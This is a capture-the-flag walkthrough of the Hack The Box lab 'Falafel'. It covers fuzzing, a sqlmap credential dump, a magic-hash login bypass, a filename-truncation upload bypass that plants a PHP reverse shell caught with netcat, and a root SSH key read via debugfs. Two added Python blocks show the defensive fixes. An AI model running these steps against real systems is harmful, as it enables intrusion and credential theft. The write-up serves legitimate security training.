HTB – Falafel

Today we are going to solve another CTF challenge, "Falafel", which is available online for those who want to improve their penetration-testing and black-box testing skills. Falafel is a retired vulnerable lab from Hack The Box, a platform for online penetration-testing practice at every experience level; it offers a collection of vulnerable labs as challenges from beginner to expert.

Level: Hard

Task: find user.txt & root.txt file on the victim’s machine

Since these labs are available online they have static IPs; Falafel's is 10.10.10.73, so let's begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.73
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-02 14:26 W. Europe Summer Time
Nmap scan report for 10.10.10.73
Host is up (0.030s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.67 seconds

We then browsed to the target IP, and it presented the login page shown.

Enumeration

robots.txt disallows /*.txt, so let's brute-force for .txt files that might contain some useful information:

root@kali:~# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404 -t 60 http://10.10.10.73/FUZZ.txt
********************************************************
* Wfuzz 2.1.5 - The Web Bruteforcer                      *
********************************************************

Target: http://10.10.10.73/FUZZ.txt
Total requests: 207643

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

01347:  C=200      1 L	       4 W	     30 Ch	  "robots"
06064:  C=200     17 L	     120 W	    804 Ch	  "cyberlaw"

Total time: 2430.657
Processed Requests: 207625
Filtered Requests: 207610
Requests/sec.: 85.41926

Let’s check cyberlaw.txt

Reading this message, I conclude that there is an admin account with a serious security issue: an attacker can take over the website through the image upload feature. There is also a hint about the URL filter.

We can also fuzz the login form for valid usernames. The first run shows that every unknown name gets the same 657-word response, so the second run hides those with --hw 657:

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --sc 200 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000003: C=200 102 L 657 W 7074 Ch "Aaron"
000004: C=200 102 L 657 W 7074 Ch "Aartjan"
000005: C=200 102 L 657 W 7074 Ch "Abagael"
000006: C=200 102 L 657 W 7074 Ch "Abagail"
000007: C=200 102 L 657 W 7074 Ch "Abahri"
^C
Finishing pending requests...

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --hw 657 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000065:  C=200    102 L	     659 W	   7091 Ch	  "Admin"
001488:  C=200    102 L	     659 W	   7091 Ch	  "Chris"

Total time: 37.51125
Processed Requests: 8607
Filtered Requests: 8605
Requests/sec.: 229.4511

The next thing to try is to check for a SQL injection vulnerability. To test it, we insert the following string as the username:

and press the login button with a random password. The page answers "Wrong identification: admin", but we never entered "admin" in the login form, so there is SQL injection!


Exploiting Web Application Vulnerabilities

We then dig further into the SQL injection with SQLMAP, passing "Wrong identification" as the --string marker that identifies a true response from the login form.

c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch
___
__H__
___ ___[(]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[*] starting @ 14:59:45 /2019-04-02/

--snip--
back-end DBMS: MySQL 5
[14:59:46] [INFO] fetching tables for database: 'falafel'
[14:59:46] [INFO] fetching number of tables for database 'falafel'
[14:59:46] [INFO] resumed: 1
[14:59:46] [INFO] resumed: users
Database: falafel
[1 table]
+-------+
| users |
+-------+

[*] ending @ 14:59:46 /2019-04-02/
c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch
___
__H__
___ ___[']_____ ___ ___ {1.2.11.19#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[*] starting @ 15:01:18 /2019-04-02/

[15:01:18] [INFO] testing connection to the target URL
--snip--
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: falafel
Table: users
[2 entries]
+----+--------+----------+----------------------------------+
| ID | role | username | password |
+----+--------+----------+----------------------------------+
| 1 | admin | admin | 0e462096931906507119562988736854 |
| 2 | normal | chris | d4ee02a22fc872e36d9e3751ba72ddc8 |
+----+--------+----------+----------------------------------+

[*] ending @ 15:01:19 /2019-04-02/

As you can observe, the password hash for user admin starts with 0e. I did not know much about this type of hash, so we searched Google and found a page about magic hashes.

As you can observe, the highlighted md5 hash (a 32-character hex string) is the same kind as the one above: PHP's loose comparison treats any hash of the form 0e followed only by digits as the number 0, so such hashes compare equal to each other.
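The following Python block is an added example, not code from the write-up or from the box; it models how PHP's loose `==` comparison turns a `0e…` digest into the number 0 (assumed PHP 5/7 numeric-string rules), shows the byte-exact comparison that closes the hole, and audits the dumped users table above for accounts whose stored hash has this "magic" form. The helper names are my own.

```python
import hashlib
import hmac
import re

# Rows dumped from the falafel users table in the write-up above.
USERS = [
    {"id": 1, "role": "admin", "username": "admin",
     "password": "0e462096931906507119562988736854"},
    {"id": 2, "role": "normal", "username": "chris",
     "password": "d4ee02a22fc872e36d9e3751ba72ddc8"},
]
ADMIN_HASH = USERS[0]["password"]

# PHP 5/7 treat a string as numeric when it parses as an int or float literal,
# including exponent notation such as "0e12345" (the number 0 * 10^12345 = 0).
# Assumption: this regex models the numeric-string rule closely enough for hex digests.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_equals(a: str, b: str) -> bool:
    """Model of PHP's `$a == $b` for two strings: if both are numeric strings they
    are compared as numbers, otherwise byte for byte."""
    if _PHP_NUMERIC.match(a) and _PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(hex_digest: str) -> bool:
    """A 'magic' hex digest is '0e' followed only by decimal digits, which PHP reads as 0.0.
    Every such digest is loosely equal to every other one and to "0"."""
    return re.fullmatch(r"0e\d+", hex_digest) is not None


def loose_password_check(stored_hash: str, supplied: str) -> bool:
    """Vulnerable pattern: md5($supplied) == $stored (loose comparison)."""
    return php_loose_equals(hashlib.md5(supplied.encode()).hexdigest(), stored_hash)


def strict_password_check(stored_hash: str, supplied: str) -> bool:
    """Hardened pattern: byte-exact, constant-time comparison (PHP: hash_equals() or ===).
    Real code should also replace unsalted MD5 with password_hash()/password_verify()."""
    return hmac.compare_digest(hashlib.md5(supplied.encode()).hexdigest(), stored_hash)


def find_magic_hash_users(rows) -> list:
    """Defender-side audit: accounts whose stored hash a loose comparison would accept
    for any other magic digest."""
    return [r["username"] for r in rows if is_magic_hash(r["password"])]


if __name__ == "__main__":
    # Constructed second magic digest, not a real md5, to show the comparison semantics.
    other_magic = "0e" + "1" * 30
    print("admin hash is magic:", is_magic_hash(ADMIN_HASH))
    print("loose  ==:", php_loose_equals(ADMIN_HASH, other_magic))
    print("strict ==:", hmac.compare_digest(ADMIN_HASH, other_magic))
    print("accounts with magic hashes:", find_magic_hash_users(USERS))
```

The audit function is the part worth reusing: run it over any users table that stores raw MD5/SHA1 hex digests and compares them with `==`, and every account it returns is one that a collision of this form would log into.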

With these credentials we log in to the admin dashboard and move to the upload option.

Here we try to upload a PHP file named shell.php, but it returns the error "Bad extension", as shown.

We then rename it shell.php.png and try the upload again.

Yes! The file with the .png extension is uploaded successfully into /var/www/html/uploads, so we can upload a malicious PHP file or any PHP backdoor with a .png extension.

Spawning Shell

Let's create a PHP payload to upload to the web site.

As shown in the image, the PHP file is uploaded successfully into /var/www/html/uploads.


Trying very long filenames, I noticed that the web app truncates the filename saved on disk to a maximum of 236 characters. With this logic we can create a 240-character filename whose last 8 characters are ".php.png". Because the extension check runs on the full name but the save truncates it, the last four characters ".png" are dropped, leaving a file with a ".php" extension.

Sample filename:

verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png
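The truncation bug above comes down to the order of two operations: the extension is validated on the name the user sent, while the name written to disk is a shortened one. The Python block below is an added example (not the application's code; the handler names and the allowed-extension list are my own assumptions) that reproduces the flawed order with a constructed 240-character name, then shows the minimal fix of validating the truncated name and the preferred fix of never storing a user-controlled name at all.

```python
import os
import secrets

MAX_STORED_NAME = 236          # truncation limit observed on the upload handler
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Constructed sample: 240 characters ending in ".php.png", like the one in the write-up.
LONG_NAME = "very" + "o" * 226 + "ng.php.png"


def extension_of(name: str) -> str:
    """Extension as the server would see it: text after the last dot, lower-cased."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def vulnerable_stored_name(upload_name: str) -> str:
    """Flawed order: validate the extension on the full name, then truncate when saving.
    Truncation chops the trailing '.png' off and '.php' becomes the effective extension."""
    if extension_of(upload_name) not in ALLOWED_EXTENSIONS:
        raise ValueError("Bad extension")
    return upload_name[:MAX_STORED_NAME]


def reordered_stored_name(upload_name: str) -> str:
    """Minimal fix: normalise and truncate first, then validate the name that reaches disk."""
    stored = os.path.basename(upload_name)[:MAX_STORED_NAME]
    if extension_of(stored) not in ALLOWED_EXTENSIONS:
        raise ValueError("Bad extension")
    return stored


def hardened_stored_name(upload_name: str) -> str:
    """Preferred fix: keep only a validated extension and generate the base name
    server-side, so neither the length nor the content of the name is user-controlled."""
    ext = extension_of(os.path.basename(upload_name))
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("Bad extension")
    return f"{secrets.token_hex(16)}.{ext}"


def rejects(handler, upload_name: str) -> bool:
    """True if the handler refuses the upload name with 'Bad extension'."""
    try:
        handler(upload_name)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print("vulnerable ->", extension_of(vulnerable_stored_name(LONG_NAME)))
    print("reordered rejects:", rejects(reordered_stored_name, LONG_NAME))
    print("hardened  ->", hardened_stored_name(LONG_NAME))
```

Even with the hardened handler, the upload directory should not be served with PHP execution enabled; a server-generated name removes the name-based bypass, and a no-execute uploads directory removes the impact if some other bypass appears.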

Let's prepare a PHP reverse shell with a very long file name and host it with Python's SimpleHTTPServer:

root@kali:~/htb/falafel# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.73 - - [02/Apr/2019 10:10:20] "GET /verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png HTTP/1.1" 200 -

Triggering the reverse shell via curl:

root@kali:~/htb/falafel# curl "http://10.10.10.73/uploads/0402-1710_61cb5b7a8480bfc4/verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php"

Netcat listener receiving the reverse shell connection:

root@kali:~/htb/falafel# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.73.
Ncat: Connection from 10.10.10.73:53576.
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
17:14:07 up 1 day, 16:59, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 Mon00 40:59m 0.15s 0.09s -bash
moshe pts/0 10.10.14.20 15:21 1:52m 0.00s 0.00s -sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@falafel:/$

We check the passwd file and notice two system users, yossi and moshe (both also visible in the w output above).

www-data@falafel:/$ cd /var/www/html
cd /var/www/html
www-data@falafel:/var/www/html$ ls
ls
assets cyberlaw.txt images login_logic.php style.php
authorized.php footer.php index.php logout.php upload.php
connection.php header.php js profile.php uploads
css icon.png login.php robots.txt
www-data@falafel:/var/www/html$ cat connection.php 
cat connection.php
<?php
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
www-data@falafel:/var/www/html$

This is the web application's MySQL connection file: the username is moshe and the password is falafelIsReallyTasty.

With these credentials we try an SSH login; after logging in successfully we find the user.txt file inside /home/moshe.

PS C:\Users\jacco> ssh moshe@10.10.10.73
moshe@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr 2 15:21:50 2019 from 10.10.14.20
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
setterm: terminal xterm-256color does not support --blank
moshe@falafel:~$ ls
user.txt
moshe@falafel:~$ cat user.txt
c86*****9d3

After further enumeration, we checked the groups of user moshe and found that the user is in the video group. When we find a user who is a member of the video group, we check the frame-buffer device for privilege escalation, because a local user able to access a frame-buffer device file (/dev/fb*) can read whatever is on the console and possibly use that to escalate their privileges on the system.

Let's dump the contents of /dev/fb0 with the cat command to capture the raw framebuffer data into /tmp as screen.raw.

Now that the raw data is in /tmp, we need to convert the raw image to a standard image format such as .png, but first we need its dimensions; the following command prints them.

Now enter the following command to convert the raw data into a .png image:

Then we opened screen.png and got the following image, which showed the password MoshePlzStopHackingMe! for user yossi.

With this credential we log in via SSH as yossi. yossi is a member of the disk group, so debugfs can read the raw filesystem directly; we use it to retrieve root's SSH RSA key and root.txt.

PS C:\Users\jacco> ssh yossi@10.10.10.73
yossi@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr  2 15:16:20 2019 from 10.10.14.20
yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare
yossi@falafel:~$ debugfs /dev/sda1
debugfs 1.42.13 (17-May-2015)
debugfs:  cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
debugfs:  cat /root/root.txt
23b*****fa1
debugfs: